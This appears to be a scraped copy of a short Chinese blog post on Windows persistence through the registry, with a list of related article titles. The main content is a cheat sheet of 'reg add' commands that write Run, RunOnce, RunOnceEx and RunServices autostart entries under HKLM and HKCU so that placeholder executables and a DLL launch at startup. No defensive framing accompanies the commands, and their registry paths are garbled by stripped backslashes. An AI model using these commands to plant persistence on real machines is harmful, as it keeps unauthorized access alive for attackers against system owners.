zoukankan      html  css  js  c++  java
  • windows权限维持之注册表

    适用于dll或者自启动
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001" /v bug /t REG_SZ /d "C:ugug.exe" 
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001Depend" /v bug /t REG_SZ /d "C:ugug.dll"
    
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServices" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    
    案例

  • 相关阅读:
    关联分析(Association analysis)
    Django简介
    YAML快速入门
    YAML 在Python中的应用
    抓包工具、日誌抓取、弱網測試
    实现轮询
    Dubbo-从入门到深入
    Spring Boot
    小程序自动生成图片的标签
    小程序上传图片的大坑
  • 原文地址:https://www.cnblogs.com/Yang34/p/14186904.html
Copyright © 2011-2022 走看看